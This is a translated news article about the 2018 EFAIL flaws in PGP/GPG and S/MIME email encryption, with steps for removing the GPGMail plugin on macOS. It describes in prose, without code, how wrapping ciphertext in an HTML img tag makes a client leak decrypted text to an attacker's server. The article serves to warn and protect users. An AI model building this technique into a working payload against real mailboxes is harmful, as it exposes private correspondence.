Ordinary users hardly use any protection to send / receive emails. Some companies and people, however, resort to PGP, GPG and S / MIME to provide a layer of protection over the messages exchanged.
We'll publish critical vulnerabilities in PGP / GPG and S / MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4
– Sebastian Schinzel (@seecurity) May 14, 2018
According Sebastian Schinzel, a professor of computer security, such protections have critical vulnerabilities that can reveal the clear text of encrypted emails, including messages already sent. All information related to the vulnerabilities found will be published tomorrow, at 4 am (for the time in Braslia).
For now there are no patches available and the only thing you can do is disable PGP / GPG or S / MIME in your email client. The affected customers (with their respective protection plugins) are: Thunderbird with Enigmail, Apple Mail with GPGTools and Outlook with Gpg4win.
The flaw involves using multipart responses to exploit HTML rendering issues. If an attacker obtains a person's encrypted email content, they are able to send the encrypted text back to the user and reveal the clear text form without having access to the sender's private encryption keys.
The attacker sends three parts (a partial declaration of the HTML img tag and a string of encrypted text, followed by the HTML for closing the image tag). This causes the email client to decrypt the text and make it the source URL of the fake image.
When the person opens the email on your client, he tries to fetch the URL to upload the image. The attacker's server records the request and keeps a copy of the content unencrypted.
How to remove GPG Tools from Mail on macOS
If you happen to have the GPG Tools (GPGMail) plugin installed in Mail, follow the recommendation below to remove it until everything is properly fixed:
- Close the Mail application (Mail Close Mail or by shortcut Q);
- In the Finder, go to Go Go To Folder (G);
- Type / Library / Mail / Bundles;
- Remove the GPGMail.mailbundle file (by dragging it to the Trash or clicking the right button on it, choosing the option "Move to Trash");
- Enter your administrator password to confirm the operation;
- If you can't find the file in the folder, go back to step 2 and type ~ / Library / Mail / Bundles.
There, when you open Mail again, the plugin will no longer be part of it.
On iOS the simplest thing, just go to Mail Settings and disable the ?Upload Images? option.
The flaw can be resolved with a software update and, of course, those responsible are already working on it.
As a momentary alternative for those who really need secure end-to-end communication, it is ideal to migrate to some messenger like Signal or iMessage (in Signal, there is still the feature that makes messages disappear).
via MacRumors: 1, 2; 9to5Mac